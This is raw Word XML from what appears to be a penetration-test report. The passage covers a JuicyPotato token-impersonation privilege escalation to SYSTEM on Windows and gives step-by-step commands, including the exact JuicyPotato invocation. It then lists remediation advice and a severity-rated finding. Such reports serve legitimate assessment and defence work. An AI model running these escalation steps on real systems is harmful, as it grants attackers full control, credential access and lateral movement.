        <w:t>heir privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3E3D4960">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B18476A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from any low privileged user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3E3D496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1E5E8B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FE173BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With SYSTEM permissions, the attacker can access any confidential data</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="453F48A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or stored credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5FE173B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FE173BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">on the machine, deface any running services, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00EBB079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>move laterally to other machines that interact with the affected machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="511871E1" w14:textId="7E33BE92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="46EC6142" w:rsidP="0D325B6E" w:rsidRDefault="46EC6142" w14:paraId="290B7911" w14:textId="7F75E55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CABD9C0" w:rsidP="0D325B6E" w:rsidRDefault="3CABD9C0" w14:paraId="5C7261F4" w14:textId="36CAA9AD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Step 1: Check if the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3CABD9C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>current service account</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has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SeImpersonate</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30064DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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SeAssignPrimaryToken</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privileges:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CABD9C0" w:rsidP="0D325B6E" w:rsidRDefault="3CABD9C0" w14:paraId="5FFBA62D" w14:textId="596C5190">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="72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3DC057F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*codeblock?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whoami /priv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CABD9C0" w:rsidP="0D325B6E" w:rsidRDefault="3CABD9C0" w14:paraId="2EE84E61" w14:textId="7CD91A95">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>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20921C35" w:rsidP="0D325B6E" w:rsidRDefault="20921C35" w14:paraId="2CEDD8E6" w14:textId="4D006C05">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0921C35">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Transfer JuicyPotato.exe to the target system</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A8CB30E">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hyperlink r:id="R3acef2642cad4d7c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7A8CB30E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/ohpe/juicy-potato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A8CB30E">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514B819F" w14:textId="12414C89">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7A8CB30E" w:rsidP="0D325B6E" w:rsidRDefault="7A8CB30E" w14:paraId="1C416996" w14:textId="69B7E74D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A8CB30E">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Find a working CLSID for the target OS version from the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JuicyPotato</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repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="213CF3AA" w14:textId="70EF7754">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1BE26B81" w:rsidP="0D325B6E" w:rsidRDefault="1BE26B81" w14:paraId="6A46685E" w14:textId="732ED6F9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BE26B81">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 4: Execute the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CABD9C0" w:rsidP="0D325B6E" w:rsidRDefault="3CABD9C0" w14:paraId="086DD758" w14:textId="7E71F693">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="72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JuicyPotato.exe -l 1337 -p </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7ECAA872">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EFBF606">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indows\</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="590C8C8C">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ystem32\cmd.exe -a "/c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whoami</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&gt; C:\output.txt" -t * -c {CLSID}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CABD9C0" w:rsidP="0D325B6E" w:rsidRDefault="3CABD9C0" w14:paraId="651AB2DF" w14:textId="7A68FAAF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>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1A22050B" w:rsidP="0D325B6E" w:rsidRDefault="1A22050B" w14:paraId="14CC91D4" w14:textId="10A6E6EA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A22050B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 5</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Check the output file to confirm SYSTEM-level access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CABD9C0" w:rsidP="0D325B6E" w:rsidRDefault="3CABD9C0" w14:paraId="0E387C9D" w14:textId="09CA0A8F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>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type C:\output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CABD9C0" w:rsidP="0D325B6E" w:rsidRDefault="3CABD9C0" w14:paraId="726F0F73" w14:textId="2F002FCF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
      </w:pP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Expected output: </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nt</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3CABD9C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="528C6E23" w14:textId="72F4BB5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6EC6142" w:rsidP="0D325B6E" w:rsidRDefault="46EC6142" w14:paraId="206262F6" w14:textId="5B40B96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6EC6142" w:rsidP="0D325B6E" w:rsidRDefault="46EC6142" w14:paraId="0CA6721B" w14:textId="7DF08D3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EC614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6EC614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742980A1">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7AE8FF53" w:rsidP="0D325B6E" w:rsidRDefault="7AE8FF53" w14:paraId="1D418E4F" w14:textId="2C8DBD2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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AE8FF53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the latest Windows security patch, which will address several </w:t>
      </w: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Potato-style exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75A9BDB2" w:rsidP="0D325B6E" w:rsidRDefault="75A9BDB2" w14:paraId="2955C701" w14:textId="7A81BD75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Service accounts should not be given the “</w:t>
      </w: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SeImpersonate</w:t>
      </w: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 or “</w:t>
      </w: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SeAssignPrimaryToken</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="75A9BDB2">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2A149F49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges unless necessary. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="608EDA41" w:rsidP="0D325B6E" w:rsidRDefault="608EDA41" w14:paraId="52034902" w14:textId="3E18BB94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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608EDA41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If DCOM is not necessary, it should be disabled or removed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="608EDA41" w:rsidP="0D325B6E" w:rsidRDefault="608EDA41" w14:paraId="781CC73D" w14:textId="2C9E8394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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608EDA41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In systems where these protections </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="652729C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are not viable</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="608EDA4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EDA3BC6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the network should be sufficiently segmented to prevent lateral access and suspicious impersonation techniques should be properly logged.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51B10FF2" w:rsidP="0D325B6E" w:rsidRDefault="51B10FF2" w14:paraId="6BE24697" w14:textId="62F7A105">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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1B10FF2">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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="500BA4DC" w14:textId="532AC9CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="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CC330D9" w14:textId="1A430169">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46EC6142" w:rsidP="0D325B6E" w:rsidRDefault="46EC6142" w14:paraId="308DDBBD" w14:textId="031451C6">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Re</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="24E28E8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>feren</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46EC6142">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39356646" w:rsidP="0D325B6E" w:rsidRDefault="39356646" w14:paraId="1B8A7257" w14:textId="5D44DB81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R7e04874b2d0541c0">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="39356646">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft Learn - Behavior Blocking Containment, Juicy Potato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39356646">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7441AC7C" w14:textId="438C1BA9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7861D7DA" w14:textId="05050A21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="43621E12" w14:textId="33CB49FC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7C13BF28" w14:textId="796677DC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="6E9BE266" w14:textId="6F775F16">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F326701">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F326701">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F326701">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Token Impersonation </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F326701">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F326701">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation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5016DEC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6A5E08" w14:textId="0FBC588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45D02D" w14:textId="3B52FC3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F88B73" w14:textId="28ADD211">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529C5EA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E2EA3D" w14:textId="61EF1F7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307D786" w14:textId="747B4645">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B7AA3BB" w14:textId="12DCBBC8">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9.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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80DFAD6" w14:textId="3590E996">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330E75F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9F33FBC" w14:textId="600F184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14D5DFB" w:rsidP="0D325B6E" w:rsidRDefault="414D5DFB" w14:paraId="4FF7E042" w14:textId="4857A9FF">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414D5DFB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCap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96C7601"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F055C7B"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="015734B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4293AF" w14:textId="68AF244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761FC4F" w14:textId="3C523143">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L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="R06181e01d0d04ae2">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
